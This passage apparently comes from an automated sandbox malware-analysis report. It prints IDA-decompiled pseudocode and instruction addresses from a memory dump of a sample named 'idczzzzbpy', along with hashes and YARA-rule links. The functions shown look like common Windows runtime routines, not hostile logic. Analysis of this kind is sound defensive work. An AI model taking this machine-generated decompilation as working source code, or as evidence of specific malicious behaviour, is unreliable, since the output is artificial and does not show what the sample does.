								_t85 = 6;
								_v20 = _t85;
								_t87 = E0169F0BF( &_v20,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								__eflags = _t87;
								if(_t87 < 0) {
									goto L3;
								}
								 *((char*)(_t108 + 0xe)) = 1;
								goto L15;
							}
							__eflags = _t53 - 0xc000026e;
							if(__eflags != 0) {
								goto L3;
							}
							goto L12;
						}
						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
							goto L3;
						} else {
							goto L9;
						}
					}
					L3:
					_t49 = _t104;
					goto L4;
				}
				_t49 = 0;
				goto L4;
			}

























                    0x016652a5
                    0x016652ad
                    0x016652b0
                    0x016652b3
                    0x016652b7
                    0x016652ba
                    0x016652bf
                    0x016652c4
                    0x016652cc
                    0x00000000
                    0x00000000
                    0x016652ce
                    0x016652d9
                    0x016652dd
                    0x016652e7
                    0x016652f7
                    0x016652f9
                    0x016652fd
                    0x016c0dcf
                    0x016c0dd5
                    0x016c0dd6
                    0x016c0dd7
                    0x016c0dd8
                    0x016c0dd9
                    0x016c0dde
                    0x016c0ddf
                    0x016c0de0
                    0x016c0de1
                    0x016c0de2
                    0x016c0de5
                    0x016c0dea
                    0x016c0dec
                    0x016c0f60
                    0x016c0f64
                    0x016c0f70
                    0x016c0f76
                    0x016c0f79
                    0x016c0f79
                    0x00000000
                    0x016c0f64
                    0x016c0df2
                    0x016c0df7
                    0x016c0e04
                    0x016c0e0d
                    0x016c0e0d
                    0x016c0e10
                    0x016c0e1a
                    0x016c0e1c
                    0x016c0e4c
                    0x016c0e52
                    0x016c0e61
                    0x016c0e67
                    0x016c0e6b
                    0x016c0e70
                    0x016c0e76
                    0x016c0ed7
                    0x016c0edc
                    0x016c0ee0
                    0x016c0ee6
                    0x016c0eea
                    0x016c0eed
                    0x016c0ef0
                    0x016c0ef3
                    0x016c0ef6
                    0x016c0ef9
                    0x016c0efe
                    0x016c0f01
                    0x016c0f01
                    0x016c0f0b
                    0x016c0f12
                    0x016c0f16
                    0x016c0f18
                    0x016c0f1b
                    0x016c0f2c
                    0x016c0f31
                    0x016c0f31
                    0x016c0f35
                    0x016c0f39
                    0x016c0f3a
                    0x016c0f3c
                    0x016c0f3f
                    0x016c0f50
                    0x016c0f55
                    0x016c0f55
                    0x016c0f59
                    0x016652eb
                    0x016652f1
                    0x016652f1
                    0x016c0e7d
                    0x016c0e84
                    0x016c0e88
                    0x016c0e8a
                    0x016c0e8d
                    0x016c0e9e
                    0x016c0ea3
                    0x016c0ea3
                    0x016c0ea7
                    0x016c0eaf
                    0x016c0eb3
                    0x016c0eb9
                    0x016c0eb9
                    0x016c0ebc
                    0x016c0ecd
                    0x016c0ecd
                    0x00000000
                    0x016c0eb3
                    0x016c0e21
                    0x016c0e2b
                    0x016c0e2f
                    0x016c0e30
                    0x016c0e3a
                    0x016c0e3f
                    0x016c0e41
                    0x00000000
                    0x00000000
                    0x016c0e47
                    0x00000000
                    0x016c0e47
                    0x016c0df9
                    0x016c0dfe
                    0x00000000
                    0x00000000
                    0x00000000
                    0x016c0dfe
                    0x01665303
                    0x01665307
                    0x00000000
                    0x01665309
                    0x00000000
                    0x01665309
                    0x01665307
                    0x016652e9
                    0x016652e9
                    0x00000000
                    0x016652e9
                    0x0166530e
                    0x00000000

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 5e38b8ad6ee57df2a67a343e9c38ca649437c36f8eacde48f204b74540b38bd7
                    • Instruction ID: 8fc5c8a05af90b64da0e8ba0583fe7b347b251faa5a51afd037ec911c7577bf2
                    • Opcode Fuzzy Hash: 5e38b8ad6ee57df2a67a343e9c38ca649437c36f8eacde48f204b74540b38bd7
                    • Instruction Fuzzy Hash: 9E51DA71105382ABD721EF68CC41B27BBE9FF54B14F10491EF89683651EBB0E844CBA6
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 01692AE4 Relevance: .2, Instructions: 159COMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E01692AE4(intOrPtr* __ecx, intOrPtr __edx, signed int _a4, short* _a8, intOrPtr _a12, signed int* _a16) {
				signed short* _v8;
				signed short* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr* _v28;
				signed int _v32;
				signed int _v36;
				short _t56;
				signed int _t57;
				intOrPtr _t58;
				signed short* _t61;
				intOrPtr _t72;
				intOrPtr _t75;
				intOrPtr _t84;
				intOrPtr _t87;
				intOrPtr* _t90;
				signed short* _t91;
				signed int _t95;
				signed short* _t96;
				intOrPtr _t97;
				intOrPtr _t102;
				signed int _t108;
				intOrPtr _t110;
				signed int _t111;
				signed short* _t112;
				void* _t113;
				signed int _t116;
				signed short** _t119;
				short* _t120;
				signed int _t123;
				signed int _t124;
				void* _t125;
				intOrPtr _t127;
				signed int _t128;

				_t90 = __ecx;
				_v16 = __edx;
				_t108 = _a4;
				_v28 = __ecx;
				_t4 = _t108 - 1; // -1
				if(_t4 > 0x13) {
					L15:
					_t56 = 0xc0000100;
					L16:
					return _t56;
				}
				_t57 = _t108 * 0x1c;
				_v32 = _t57;
				_t6 = _t57 + 0x1758204; // 0x0
				_t123 =  *_t6;
				_t7 = _t57 + 0x1758208; // 0x1758207
				_t8 = _t57 + 0x1758208; // 0x1758207
				_t119 = _t8;
				_v36 = _t123;
				_t110 = _t7 + _t123 * 8;
				_v24 = _t110;
				_t111 = _a4;
				if(_t119 >= _t110) {
					L12:
					if(_t123 != 3) {
						_t58 =  *0x1758450; // 0x0
						if(_t58 == 0) {
							_t58 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x48));
						}
					} else {
						_t26 = _t57 + 0x175821c; // 0x0
						_t58 =  *_t26;
					}
					 *_t90 = _t58;
					goto L15;
				} else {
					goto L2;
				}
				while(1) {
					_t116 =  *_t61 & 0x0000ffff;
					_t128 =  *(_t127 + _t61) & 0x0000ffff;
					if(_t116 == _t128) {
						goto L18;
					}
					L5:
					if(_t116 >= 0x61) {
						if(_t116 > 0x7a) {
							_t97 =  *0x1756d5c; // 0x7f3d0654
							_t72 =  *0x1756d5c; // 0x7f3d0654
							_t75 =  *0x1756d5c; // 0x7f3d0654
							_t116 =  *((intOrPtr*)(_t75 + (( *(_t72 + (( *(_t97 + (_t116 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t116 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t116 & 0x0000000f)) * 2)) + _t116 & 0x0000ffff;
						} else {
							_t116 = _t116 - 0x20;
						}
					}
					if(_t128 >= 0x61) {
						if(_t128 > 0x7a) {
							_t102 =  *0x1756d5c; // 0x7f3d0654
							_t84 =  *0x1756d5c; // 0x7f3d0654
							_t87 =  *0x1756d5c; // 0x7f3d0654
							_t128 =  *((intOrPtr*)(_t87 + (( *(_t84 + (( *(_t102 + (_t128 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t128 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t128 & 0x0000000f)) * 2)) + _t128 & 0x0000ffff;
						} else {
							_t128 = _t128 - 0x20;
						}
					}
					if(_t116 == _t128) {
						_t61 = _v12;
						_t96 = _v8;
					} else {
						_t113 = _t116 - _t128;
						L9:
						_t111 = _a4;
						if(_t113 == 0) {
							_t115 =  &(( *_t119)[_t111 + 1]);
							_t33 =  &(_t119[1]); // 0x100
							_t120 = _a8;
							_t95 =  *_t33 -  &(( *_t119)[_t111 + 1]) >> 1;
							_t35 = _t95 - 1; // 0xff
							_t124 = _t35;
							if(_t120 == 0) {
								L27:
								 *_a16 = _t95;
								_t56 = 0xc0000023;
								goto L16;
							}
							if(_t124 >= _a12) {
								if(_a12 >= 1) {
									 *_t120 = 0;
								}
								goto L27;
							}
							 *_a16 = _t124;
							_t125 = _t124 + _t124;
							E016AF3E0(_t120, _t115, _t125);
							_t56 = 0;
							 *((short*)(_t125 + _t120)) = 0;
							goto L16;
						}
						_t119 =  &(_t119[2]);
						if(_t119 < _v24) {
							L2:
							_t91 =  *_t119;
							_t61 = _t91;
							_v12 = _t61;
							_t112 =  &(_t61[_t111]);
							_v8 = _t112;
							if(_t61 >= _t112) {
								break;
							} else {
								_t127 = _v16 - _t91;
								_t96 = _t112;
								_v20 = _t127;
								_t116 =  *_t61 & 0x0000ffff;
								_t128 =  *(_t127 + _t61) & 0x0000ffff;
								if(_t116 == _t128) {
									goto L18;
								}
								goto L5;
							}
						} else {
							_t90 = _v28;
							_t57 = _v32;
							_t123 = _v36;
							goto L12;
						}
					}
					L18:
					_t61 =  &(_t61[1]);
					_v12 = _t61;
					if(_t61 >= _t96) {
						break;
					}
					_t127 = _v20;
				}
				_t113 = 0;
				goto L9;
			}






































                    0x01692ae4
                    0x01692aec
                    0x01692aef
                    0x01692af4
                    0x01692af7
                    0x01692afd
                    0x01692b92
                    0x01692b92
                    0x01692b97
                    0x01692b9c
                    0x01692b9c
                    0x01692b03
                    0x01692b06
                    0x01692b09
                    0x01692b09
                    0x01692b0f
                    0x01692b15
                    0x01692b15
                    0x01692b1b
                    0x01692b1e
                    0x01692b21
                    0x01692b26
                    0x01692b29
                    0x01692b81
                    0x01692b84
                    0x01692c0e
                    0x01692c15
                    0x01692c24
                    0x01692c24
                    0x01692b8a
                    0x01692b8a
                    0x01692b8a
                    0x01692b8a
                    0x01692b90
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x01692b4a
                    0x01692b4a
                    0x01692b4d
                    0x01692b53
                    0x00000000
                    0x00000000
                    0x01692b55
                    0x01692b58
                    0x01692bb7
                    0x016d5d1b
                    0x016d5d37
                    0x016d5d47
                    0x016d5d53
                    0x01692bbd
                    0x01692bbd
                    0x01692bbd
                    0x01692bb7
                    0x01692b5d
                    0x01692c2f
                    0x016d5d5b
                    0x016d5d77
                    0x016d5d87
                    0x016d5d93
                    0x01692c35
                    0x01692c35
                    0x01692c35
                    0x01692c2f
                    0x01692b65
                    0x01692b9f
                    0x01692ba2
                    0x01692b67
                    0x01692b67
                    0x01692b69
                    0x01692b6b
                    0x01692b6e
                    0x01692bc9
                    0x01692bcc
                    0x01692bcf
                    0x01692bd4
                    0x01692bd6
                    0x01692bd6
                    0x01692bdb
                    0x01692c02
                    0x01692c05
                    0x01692c07
                    0x00000000
                    0x01692c07
                    0x01692be0
                    0x01692c00
                    0x01692c3f
                    0x01692c3f
                    0x00000000
                    0x01692c00
                    0x01692be5
                    0x01692be7
                    0x01692bec
                    0x01692bf4
                    0x01692bf6
                    0x00000000
                    0x01692bf6
                    0x01692b70
                    0x01692b76
                    0x01692b2b
                    0x01692b2b
                    0x01692b2d
                    0x01692b2f
                    0x01692b32
                    0x01692b35
                    0x01692b3a
                    0x00000000
                    0x01692b40
                    0x01692b43
                    0x01692b45
                    0x01692b47
                    0x01692b4a
                    0x01692b4d
                    0x01692b53
                    0x00000000
                    0x00000000
                    0x00000000
                    0x01692b53
                    0x01692b78
                    0x01692b78
                    0x01692b7b
                    0x01692b7e
                    0x00000000
                    0x01692b7e
                    0x01692b76
                    0x01692ba5
                    0x01692ba5
                    0x01692ba8
                    0x01692bad
                    0x00000000
                    0x00000000
                    0x01692baf
                    0x01692baf
                    0x01692bc2
                    0x00000000

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: dec8eb1ee25dbf135db19fa90e1238a1a0c4be37799edac9e0f8994a87f34de0
                    • Instruction ID: bfbe5af431c261cfc93a28adb055272d63f7be51a9d8c4bb9edc1ba5879c40de
                    • Opcode Fuzzy Hash: dec8eb1ee25dbf135db19fa90e1238a1a0c4be37799edac9e0f8994a87f34de0
                    • Instruction Fuzzy Hash: A751D076A00115DFCF18CF1CC8A09BDB7F5FB98704705845EE8469B318D734AA91CB90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0172AE44 Relevance: .2, Instructions: 152COMMON
                    Download Yara Rule
                    C-Code - Quality: 86%
                    			E0172AE44(signed char __ecx, signed int __edx, signed int _a4, signed char _a8, signed int* _a12) {
				signed int _v8;
				signed int _v12;
				void* __esi;
				void* __ebp;
				signed short* _t36;
				signed int _t41;
				char* _t42;
				intOrPtr _t43;
				signed int _t47;
				void* _t52;
				signed int _t57;
				intOrPtr _t61;
				signed char _t62;
				signed int _t72;
				signed char _t85;
				signed int _t88;

				_t73 = __edx;
				_push(__ecx);
				_t85 = __ecx;
				_v8 = __edx;
				_t61 =  *((intOrPtr*)(__ecx + 0x28));
				_t57 = _a4 |  *(__ecx + 0xc) & 0x11000001;
				if(_t61 != 0 && _t61 ==  *((intOrPtr*)( *[fs:0x18] + 0x24))) {
					_t57 = _t57 | 0x00000001;
				}
				_t88 = 0;
				_t36 = 0;
				_t96 = _a12;
				if(_a12 == 0) {
					_t62 = _a8;
					__eflags = _t62;
					if(__eflags == 0) {
						goto L12;
					}
					_t52 = E0172C38B(_t85, _t73, _t57, 0);
					_t62 = _a8;
					 *_t62 = _t52;
					_t36 = 0;
					goto L11;
				} else {
					_t36 = E0172ACFD(_t85, _t73, _t96, _t57, _a8);
					if(0 == 0 || 0 == 0xffffffff) {
						_t72 = _t88;
					} else {
						_t72 =  *0x00000000 & 0x0000ffff;
					}
					 *_a12 = _t72;
					_t62 = _a8;
					L11:
					_t73 = _v8;
					L12:
					if((_t57 & 0x01000000) != 0 ||  *((intOrPtr*)(_t85 + 0x20)) == _t88) {
						L19:
						if(( *(_t85 + 0xc) & 0x10000000) == 0) {
							L22:
							_t74 = _v8;
							__eflags = _v8;
							if(__eflags != 0) {
								L25:
								__eflags = _t88 - 2;
								if(_t88 != 2) {
									__eflags = _t85 + 0x44 + (_t88 << 6);
									_t88 = E0172FDE2(_t85 + 0x44 + (_t88 << 6), _t74, _t57);
									goto L34;
								}
								L26:
								_t59 = _v8;
								E0172EA55(_t85, _v8, _t57);
								asm("sbb esi, esi");
								_t88 =  ~_t88;
								_t41 = E01687D50();
								__eflags = _t41;
								if(_t41 == 0) {
									_t42 = 0x7ffe0380;
								} else {
									_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
								}
								__eflags =  *_t42;
								if( *_t42 != 0) {
									_t43 =  *[fs:0x30];
									__eflags =  *(_t43 + 0x240) & 0x00000001;
									if(( *(_t43 + 0x240) & 0x00000001) != 0) {
										__eflags = _t88;
										if(_t88 != 0) {
											E01721608(_t85, _t59, 3);
										}
									}
								}
								goto L34;
							}
							_push(_t62);
							_t47 = E01731536(0x1758ae4, (_t74 -  *0x1758b04 >> 0x14) + (_t74 -  *0x1758b04 >> 0x14), _t88, __eflags);
							__eflags = _t47;
							if(_t47 == 0) {
								goto L26;
							}
							_t74 = _v12;
							_t27 = _t47 - 1; // -1
							_t88 = _t27;
							goto L25;
						}
						_t62 = _t85;
						if(L0172C323(_t62, _v8, _t57) != 0xffffffff) {
							goto L22;
						}
						_push(_t62);
						_push(_t88);
						E0172A80D(_t85, 9, _v8, _t88);
						goto L34;
					} else {
						_t101 = _t36;
						if(_t36 != 0) {
							L16:
							if(_t36 == 0xffffffff) {
								goto L19;
							}
							_t62 =  *((intOrPtr*)(_t36 + 2));
							if((_t62 & 0x0000000f) == 0) {
								goto L19;
							}
							_t62 = _t62 & 0xf;
							if(E0170CB1E(_t62, _t85, _v8, 3, _t36 + 8) < 0) {
								L34:
								return _t88;
							}
							goto L19;
						}
						_t62 = _t85;
						_t36 = E0172ACFD(_t62, _t73, _t101, _t57, _t62);
						if(_t36 == 0) {
							goto L19;
						}
						goto L16;
					}
				}
			}



















                    0x0172ae44
                    0x0172ae4c
                    0x0172ae53
                    0x0172ae55
                    0x0172ae5c
                    0x0172ae64
                    0x0172ae68
                    0x0172ae75
                    0x0172ae75
                    0x0172ae78
                    0x0172ae7a
                    0x0172ae7c
                    0x0172ae7f
                    0x0172aea8
                    0x0172aeab
                    0x0172aead
                    0x00000000
                    0x00000000
                    0x0172aeb3
                    0x0172aeb8
                    0x0172aebb
                    0x0172aebd
                    0x00000000
                    0x0172ae81
                    0x0172ae88
                    0x0172ae8f
                    0x0172ae9b
                    0x0172ae96
                    0x0172ae96
                    0x0172ae96
                    0x0172aea0
                    0x0172aea3
                    0x0172aebf
                    0x0172aebf
                    0x0172aec3
                    0x0172aec9
                    0x0172af0d
                    0x0172af14
                    0x0172af3d
                    0x0172af3d
                    0x0172af41
                    0x0172af44
                    0x0172af67
                    0x0172af67
                    0x0172af6a
                    0x0172afca
                    0x0172afd1
                    0x00000000
                    0x0172afd1
                    0x0172af6c
                    0x0172af6d
                    0x0172af75
                    0x0172af7c
                    0x0172af7e
                    0x0172af80
                    0x0172af85
                    0x0172af87
                    0x0172af99
                    0x0172af89
                    0x0172af92
                    0x0172af92
                    0x0172af9e
                    0x0172afa1
                    0x0172afa3
                    0x0172afa9
                    0x0172afb0
                    0x0172afb2
                    0x0172afb4
                    0x0172afbc
                    0x0172afbc
                    0x0172afb4
                    0x0172afb0
                    0x00000000
                    0x0172afa1
                    0x0172af4f
                    0x0172af57
                    0x0172af5c
                    0x0172af5e
                    0x00000000
                    0x00000000
                    0x0172af60
                    0x0172af64
                    0x0172af64
                    0x00000000
                    0x0172af64
                    0x0172af1a
                    0x0172af25
                    0x00000000
                    0x00000000
                    0x0172af27
                    0x0172af28
                    0x0172af33
                    0x00000000
                    0x0172aed0
                    0x0172aed0
                    0x0172aed2
                    0x0172aee1
                    0x0172aee4
                    0x00000000
                    0x00000000
                    0x0172aee6
                    0x0172aeec
                    0x00000000
                    0x00000000
                    0x0172aefb
                    0x0172af07
                    0x0172afd3
                    0x0172afdb
                    0x0172afdb
                    0x00000000
                    0x0172af07
                    0x0172aed6
                    0x0172aed8
                    0x0172aedf
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0172aedf
                    0x0172aec9

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 8260f75cac3ecaad4f9b9d2d98339f5226bba44c1d5e5ec845629a7619353906
                    • Instruction ID: 1db59236e737c5f4f710ca90bac47b78eb7fc5de78e5bb4cb41be3e66d340df4
                    • Opcode Fuzzy Hash: 8260f75cac3ecaad4f9b9d2d98339f5226bba44c1d5e5ec845629a7619353906
                    • Instruction Fuzzy Hash: BE410671B007329BD726CA29C894F3BF79AEF94620F044659F91687AD4DB38D903C691
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0168DBE9 Relevance: .1, Instructions: 149COMMON
                    Download Yara Rule
                    C-Code - Quality: 86%
                    			E0168DBE9(intOrPtr __ecx, intOrPtr __edx, signed int* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				signed int* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* __ebx;
				void* __edi;
				signed int _t54;
				char* _t58;
				signed int _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				intOrPtr _t72;
				intOrPtr _t73;
				signed int* _t75;
				intOrPtr _t79;
				intOrPtr _t80;
				char _t82;
				signed int _t83;
				signed int _t84;
				signed int _t88;
				signed int _t89;
				intOrPtr _t90;
				intOrPtr _t92;
				signed int _t97;
				intOrPtr _t98;
				intOrPtr* _t99;
				signed int* _t101;
				signed int* _t102;
				intOrPtr* _t103;
				intOrPtr _t105;
				signed int _t106;
				void* _t118;

				_t92 = __edx;
				_t75 = _a4;
				_t98 = __ecx;
				_v44 = __edx;
				_t106 = _t75[1];
				_v40 = __ecx;
				if(_t106 < 0 || _t106 <= 0 &&  *_t75 < 0) {
					_t82 = 0;
				} else {
					_t82 = 1;
				}
				_v5 = _t82;
				_t6 = _t98 + 0xc8; // 0xc9
				_t101 = _t6;
				 *((intOrPtr*)(_t98 + 0xd4)) = _a12;
				_v16 = _t92 + ((0 | _t82 != 0x00000000) - 0x00000001 & 0x00000048) + 8;
				 *((intOrPtr*)(_t98 + 0xd8)) = _a8;
				if(_t82 != 0) {
					 *(_t98 + 0xde) =  *(_t98 + 0xde) | 0x00000002;
					_t83 =  *_t75;
					_t54 = _t75[1];
					 *_t101 = _t83;
					_t84 = _t83 | _t54;
					_t101[1] = _t54;
					if(_t84 == 0) {
						_t101[1] = _t101[1] & _t84;
						 *_t101 = 1;
					}
					goto L19;
				} else {
					if(_t101 == 0) {
						E0166CC50(E01664510(0xc000000d));
						_t88 =  *_t101;
						_t97 = _t101[1];
						L15:
						_v12 = _t88;
						_t66 = _t88 -  *_t75;
						_t89 = _t97;
						asm("sbb ecx, [ebx+0x4]");
						_t118 = _t89 - _t97;
						if(_t118 <= 0 && (_t118 < 0 || _t66 < _v12)) {
							_t66 = _t66 | 0xffffffff;
							_t89 = 0x7fffffff;
						}
						 *_t101 = _t66;
						_t101[1] = _t89;
						L19:
						if(E01687D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t58 = 0x7ffe0386;
						}
						_t102 = _v16;
						if( *_t58 != 0) {
							_t58 = E01738ED6(_t102, _t98);
						}
						_t76 = _v44;
						E01682280(_t58, _v44);
						E0168DD82(_v44, _t102, _t98);
						E0168B944(_t102, _v5);
						return E0167FFB0(_t76, _t98, _t76);
					}
					_t99 = 0x7ffe03b0;
					do {
						_t103 = 0x7ffe0010;
						do {
							_t67 =  *0x1758628; // 0x0
							_v28 = _t67;
							_t68 =  *0x175862c; // 0x0
							_v32 = _t68;
							_v24 =  *((intOrPtr*)(_t99 + 4));
							_v20 =  *_t99;
							while(1) {
								_t97 =  *0x7ffe000c;
								_t90 =  *0x7FFE0008;
								if(_t97 ==  *_t103) {
									goto L10;
								}
								asm("pause");
							}
							L10:
							_t79 = _v24;
							_t99 = 0x7ffe03b0;
							_v12 =  *0x7ffe03b0;
							_t72 =  *0x7FFE03B4;
							_t103 = 0x7ffe0010;
							_v36 = _t72;
						} while (_v20 != _v12 || _t79 != _t72);
						_t73 =  *0x1758628; // 0x0
						_t105 = _v28;
						_t80 =  *0x175862c; // 0x0
					} while (_t105 != _t73 || _v32 != _t80);
					_t98 = _v40;
					asm("sbb edx, [ebp-0x20]");
					_t88 = _t90 - _v12 - _t105;
					_t75 = _a4;
					asm("sbb edx, eax");
					_t31 = _t98 + 0xc8; // 0x172fb53
					_t101 = _t31;
					 *_t101 = _t88;
					_t101[1] = _t97;
					goto L15;
				}
			}









































                    0x0168dbe9
                    0x0168dbf2
                    0x0168dbf7
                    0x0168dbf9
                    0x0168dbfc
                    0x0168dc00
                    0x0168dc03
                    0x0168dc14
                    0x0168dd54
                    0x0168dd54
                    0x0168dd54
                    0x0168dc18
                    0x0168dc1d
                    0x0168dc1d
                    0x0168dc32
                    0x0168dc3b
                    0x0168dc3e
                    0x0168dc46
                    0x0168dd5b
                    0x0168dd62
                    0x0168dd64
                    0x0168dd67
                    0x0168dd69
                    0x0168dd6b
                    0x0168dd6e
                    0x0168dd70
                    0x0168dd73
                    0x0168dd73
                    0x00000000
                    0x0168dc4c
                    0x0168dc4e
                    0x016d3ae3
                    0x016d3ae8
                    0x016d3aea
                    0x0168dce7
                    0x0168dce9
                    0x0168dcec
                    0x0168dcee
                    0x0168dcf0
                    0x0168dcf3
                    0x0168dcf5
                    0x016d3af2
                    0x016d3af5
                    0x016d3af5
                    0x0168dd06
                    0x0168dd08
                    0x0168dd0b
                    0x0168dd12
                    0x016d3b08
                    0x0168dd18
                    0x0168dd18
                    0x0168dd18
                    0x0168dd20
                    0x0168dd23
                    0x016d3b16
                    0x016d3b16
                    0x0168dd29
                    0x0168dd2d
                    0x0168dd36
                    0x0168dd40
                    0x0168dd51
                    0x0168dd51
                    0x0168dc54
                    0x0168dc59
                    0x0168dc59
                    0x0168dc5e
                    0x0168dc5e
                    0x0168dc63
                    0x0168dc66
                    0x0168dc6b
                    0x0168dc78
                    0x0168dc7b
                    0x0168dc81
                    0x0168dc81
                    0x0168dc83
                    0x0168dc89
                    0x00000000
                    0x00000000
                    0x0168dd7b
                    0x0168dd7b
                    0x0168dc8f
                    0x0168dc8f
                    0x0168dc92
                    0x0168dc99
                    0x0168dc9f
                    0x0168dca5
                    0x0168dcaa
                    0x0168dcaa
                    0x0168dcb3
                    0x0168dcb8
                    0x0168dcbb
                    0x0168dcc1
                    0x0168dccf
                    0x0168dcd2
                    0x0168dcd5
                    0x0168dcd7
                    0x0168dcda
                    0x0168dcdc
                    0x0168dcdc
                    0x0168dce2
                    0x0168dce4
                    0x00000000
                    0x0168dce4

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: c3297b7d9f28ffd7cfc625ee39b3aabeb6f90fda10a5260da19cbe2df2d98ecb
                    • Instruction ID: 1c2adb4ef2a8673c0948dc2a563e9f6ffef843a76c3db63d980d898ae9e2bf0b
                    • Opcode Fuzzy Hash: c3297b7d9f28ffd7cfc625ee39b3aabeb6f90fda10a5260da19cbe2df2d98ecb
                    • Instruction Fuzzy Hash: 8C51B272E00206CFCB14DFA8C890A9EFBF5FB48350F248259D955A7385DB71A944CBA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0167EF40 Relevance: .1, Instructions: 147COMMON
                    Download Yara Rule
                    C-Code - Quality: 96%
                    			E0167EF40(intOrPtr __ecx) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t58;
				char _t59;
				signed char _t69;
				void* _t73;
				signed int _t74;
				char _t79;
				signed char _t81;
				signed int _t85;
				signed int _t87;
				intOrPtr _t90;
				signed char* _t91;
				void* _t92;
				signed int _t94;
				void* _t96;

				_t90 = __ecx;
				_v16 = __ecx;
				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
					_t58 =  *((intOrPtr*)(__ecx));
					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
						E01669080(_t73, __ecx, __ecx, _t92);
					}
				}
				_t74 = 0;
				_t96 =  *0x7ffe036a - 1;
				_v12 = 0;
				_v7 = 0;
				if(_t96 > 0) {
					_t74 =  *(_t90 + 0x14) & 0x00ffffff;
					_v12 = _t74;
					_v7 = _t96 != 0;
				}
				_t79 = 0;
				_v8 = 0;
				_v5 = 0;
				while(1) {
					L4:
					_t59 = 1;
					L5:
					while(1) {
						if(_t59 == 0) {
							L12:
							_t21 = _t90 + 4; // 0x7746c21e
							_t87 =  *_t21;
							_v6 = 0;
							if(_t79 != 0) {
								if((_t87 & 0x00000002) != 0) {
									goto L19;
								}
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000003;
								} else {
									_t51 = _t87 - 2; // -2
									_t74 = _t51;
								}
								goto L15;
							} else {
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000001;
								} else {
									_t26 = _t87 - 4; // -4
									_t74 = _t26;
									if((_t74 & 0x00000002) == 0) {
										_t74 = _t74 - 2;
									}
								}
								L15:
								if(_t74 == _t87) {
									L19:
									E01662D8A(_t74, _t90, _t87, _t90);
									_t74 = _v12;
									_v8 = 1;
									if(_v7 != 0 && _t74 > 0x64) {
										_t74 = _t74 - 1;
										_v12 = _t74;
									}
									_t79 = _v5;
									goto L4;
								}
								asm("lock cmpxchg [esi], ecx");
								if(_t87 != _t87) {
									_t74 = _v12;
									_t59 = 0;
									_t79 = _v5;
									continue;
								}
								if(_v6 != 0) {
									_t74 = _v12;
									L25:
									if(_v7 != 0) {
										if(_t74 < 0x7d0) {
											if(_v8 == 0) {
												_t74 = _t74 + 1;
											}
										}
										_t38 = _t90 + 0x14; // 0x0
										_t39 = _t90 + 0x14; // 0x0
										_t85 = ( *_t38 ^ _t74) & 0x00ffffff ^  *_t39;
										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
											_t85 = _t85 & 0xff000000;
										}
										 *(_t90 + 0x14) = _t85;
									}
									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
									 *((intOrPtr*)(_t90 + 8)) = 1;
									return 0;
								}
								_v5 = 1;
								_t87 = _t74;
								goto L19;
							}
						}
						_t94 = _t74;
						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
						if(_t74 == 0) {
							goto L12;
						} else {
							_t91 = _t90 + 4;
							goto L8;
							L9:
							while((_t81 & 0x00000001) != 0) {
								_t69 = _t81;
								asm("lock cmpxchg [edi], edx");
								if(_t69 != _t81) {
									_t81 = _t69;
